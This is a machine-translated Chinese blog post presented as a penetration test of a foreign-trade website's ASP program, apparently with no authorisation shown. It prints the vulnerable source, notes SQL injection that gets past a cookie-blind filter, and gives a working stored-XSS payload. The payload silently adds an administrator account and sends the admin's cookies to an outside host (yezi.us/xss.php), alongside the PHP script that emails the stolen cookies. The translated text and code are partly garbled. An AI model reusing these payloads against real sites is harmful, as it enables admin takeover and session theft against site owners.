Penetration Testing of a non-mainstream Foreign Trade Website

First, I roughly read the overall structure of the website,

We found that it was not the kind of spam enterprise station that could be captured in five minutes.

The peer site saw that the same program was used.

I am so lazy to read section C, because the chance that you can ARP data in the IDC where the station is located is more difficult than that of the Chinese football team in the World Cup.

Then again. When I was doing foreign trade last year, the company seems to be using this program. At that time, I just roughly looked at this program and did not see any serious vulnerabilities.

Recently, the company had nothing to do. I checked the source code of this program with my colleagues.

Detected the following security issues


In New. asp
 
View sourceprint?
01 <! -- # Include file = "top. asp" -->
 
02 <%
 
03 page = clng (request ("page "))
 
04 Set rs = Server. CreateObject ("ADODB. RecordSet ")
 
05 SQL = "select * from member_news where type = '" & request ("type") & "'order by order0 desc"
 
06 rs. Open SQL, conn, 1, 1
 
07 if rs. eof and rs. bof then
 
08 response. Write ("No news! ")
 
09 else
 
10%>
Among them, top. asp contains inc/SQL. asp, whose content is:
 
View sourceprint?
01 <%
 
02 'SQL Filtering
 
03 Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
 
04 'custom string to be filtered, separated by "|"
 
05 Fy_In = "'|; | [| and | exec | insert | select | delete | update | count | * | % | chr | mid | master | truncate | char | declare"
 
06 '----------------------------------
 
07 Fy_Inf = split (Fy_In, "| ")
 
08 '-------- POST part ------------------
 
09 If Request. Form <> "" Then
 
10 For Each Fy_Post In Request. Form
 
11 For Fy_Xh = 0 To Ubound (Fy_Inf)
 
12 If Instr (LCase (Request. Form (Fy_Post), Fy_Inf (Fy_Xh) <> 0 Then
 
13 response. write "<script> // alert ('sorry for you put which including irregular symbol: \" & Fy_Inf (Fy_Xh) & "'); history. go (-1); </script>"
 
14 response. end
 
15 End If
 
16 Next
 
17 Next
 
18 End If
 
19 '-------- GET part -------------------
 
20 If Request. QueryString <> "Then
 
21 For Each Fy_Get In Request. QueryString
 
22 For Fy_Xh = 0 To Ubound (Fy_Inf)
 
23 If Instr (LCase (Request. QueryString (Fy_Get), Fy_Inf (Fy_Xh) <> 0 Then
 
24 response. write "<script> // alert ('sorry for you put which including irregular symbol: \" & Fy_Inf (Fy_Xh) & "'); history. go (-1); </script>"
 
25 response. end
 
26 End If
 
27 Next
 
28 Next
 
29 End If
 
30%>
Dude, why don't you put cookies in your eyes.
 
Important background logon codes admin/login. asp
 
View sourceprint?
1 md5key = "pjfmd5"
 
2 if request ("action") = "login" then
 
3 admin_name = trim (request ("admin_name "))
 
4 admin_pass = md5 (trim (request ("admin_pass") & md5key)
Therefore, obtain the injected ciphertext to ipv5 for cracking:
 
Xxooxxoo: pjfmd5
 
It is plain text.
 
Then inject a piece of code. For the sake of security, we tested it locally and the results were bright.
 
However, the hacker changed the background and tested the FTP mailbox with the password.
 
 
 
SO continue digging.
 
Half an hour later, we found inc/modify. asp
 
The following code
 
View sourceprint?
01 if request. Form ("submit") <> "then
 
02 set rs = server. createobject ("adodb. recordset ")
 
03 SQL = "select * from [user] where User_Name = '" & session ("user_name ")&"'"
 
04 rs. open SQL, conn, 1, 3
 
05 if rs. eof and rs. bof then
 
06 response. write "<SCRIPT> // alert ('Sorry, this User_name not exist! Please check it '); history. back (-1) </SCRIPT>"
 
07 response. end ()
 
08 else
 
09 for I = 2 to rs. fields. count-1
 
10 if rs. fields (I). Name = "Password2" then
 
11 elseif rs. fields (I). Name = "Country" then
 
12 rs (rs. fields (I). Name) = split (countrystr, ",") (request. Form (rs. fields (I). Name )))
 
13 elseif rs. fields (I). Name = "Password" and (request. Form (rs. fields (I). Name) <> rs ("password") then
 
14 response. Write "<SCRIPT> // alert ('you have Changed the password! '); </SCRIPT>"
 
15 rs (rs. fields (I). Name) = md5 (request. Form (rs. fields (I). Name) & md5key)
 
16 elseif rs. fields (I). Name = "sex" then
 
17 rs (rs. fields (I). Name) = ("" <> (request. Form (rs. fields (I). Name )))
 
18 else
 
19 rs (rs. fields (I). Name) = (request. Form (rs. fields (I). Name ))
 
20 end if 'Save information
 
21 next
 
22 rs. update
 
23 rs. close
 
24 end if
 
25 response. Write "<SCRIPT> // alert ('modify success! '); Location = 'Log. asp' </SCRIPT>"
 
26 response. End ()
 
27 end if %>
 
 
Related operations are not processed and directly stored into the database. That is to say, We can insert our JS in the form.
 
Okay. Let's continue to check the number of data retrieved from the backend.
 
/Admin/member/6pjf. asp
 
View sourceprint?
1 elseif request ("ac") = "<SPAN style =" FONT-FAMILY: "> member management </SPAN> <SPAN style =" FONT-FAMILY: 'times New Roman '">" then </SPAN>
 
2 .............
 
3 call rstotable (tcol_tname, where_order, "user", 20, temptitle, "6pjfadd. asp", "id", "yes ")
 
 
The rstotable Function

Data is retrieved without any filtering.

Test

 
Haha, laugh

 

According to relevant conditions, a JS exploitation is written.

Add Administrator

Record the cookies sent to my Q. Waiting results

The JS Code is:
 
View sourceprint?
01 document. write ('abama ');
 
02 var xmlHttp;
 
03 if (window. ActiveXObject ){
 
04 xmlHttp = new ActiveXObject ("Microsoft. XMLHTTP ");
 
05}
 
06 else if (window. XMLHttpRequest)
 
07 {
 
08 xmlHttp = new XMLHttpRequest ();
 
09}
 
10
 
11 function validateForm (){
 
12 str = window. location. pathname;
 
13 var strs = new Array ();
 
14 strs = str. split ("/");
 
15 x = strs [1];
 
16 var url = "/" + x + "/member/6pjfadd. asp? Ac = % ba % f3 % cc % a8 % d5 % ca % ba % c5 % c9 % e8 % d6 % c3 ";
 
17 var params = "admin_name = yezi & admin_pass = fuckyou & admin_alow = % C0 % CF % B0 % E5 & addtime = 2012-5-31 + 4% 3A55% 3A59 & submit = % CC % ED % BC % D3 % BC % C7 % C2 % BC & refer = "+ document. referrer;
 
18 xmlHttp. open ("POST", url, true );
 
19 xmlHttp. setRequestHeader ("Content-type", "application/x-www-form-urlencoded ");
 
20 xmlHttp. setRequestHeader ("Content-length", params. length );
 
21 xmlHttp. setRequestHeader ("Connection", "close ");
 
22 xmlHttp. onreadystatechange = function (){
 
23 if (xmlHttp. readyState = 4 & xmlHttp. status = 200 ){
 
24 // alert (xmlHttp. responseText );
 
25}
 
26}
 
27 xmlHttp. send (params );
 
28} www.2cto.com
 
29 validateForm ();
 
30 (function (){
 
31 var a = document. createElement ('script ');
 
32 a. setAttribute ('type', 'text/javascript ');
 
33 a. setAttribute ('src', 'HTTP: // yezi. us/xss. php? Cookie = '+ document. cookie );
 
34 document. getElementsByTagName ('head'). item (0). appendChild ();
 
35
 
36 })()
The XSS. php code is:
 
View sourceprint?
01 <? Php
 
02 date_default_timezone_set ('Asia/Shanghai ');
 
03 $ a =@ _ GET ['cooker'];
 
04 $ ref = $ _ SERVER ['HTTP _ referer'];
 
05 $ data = $ a. "--- cookie". "\ r \ n". $ ref. "--- referer". "\ r \ n ";
 
06 $ to = '2017 **** @ qq.com ';
 
07 $ subject = 'you have something From: '. $ ref;
 
08 $ body = "\ n ------- URL = ". $ ref. "\ n ------- Time = ". date ("Y-m-d H: I: s "). "\ n ------- Data = ". $ data. "\ n ----------------------------------------------";
 
09 $ headers = 'mime-Version: 1.0 '. "\ r \ n ";
 
10 $ headers. = 'content-type: text/html; charset = UTF-8 '. "\ r \ n ";
 
11 $ headers. = "Here Come Some Password ";
 
12 if (! Empty ($ )){
 
13 $ sendmail = @ mail ($ to, $ subject, $ body, $ headers );
 
14 if (! $ Sendmail ){
 
15 @ $ file = fopen('xsstest.txt ', 'a + ');
 
16 @ $ write = fwrite ($ file, $ a. $ ref. $ data. "\ r \ n ");
 
17 @ fclose ($ file );
 
18}
 
19} else {
 
20 echo "Hey, man, What r u doing? ";
 
21}
 
22?>

From yezi. us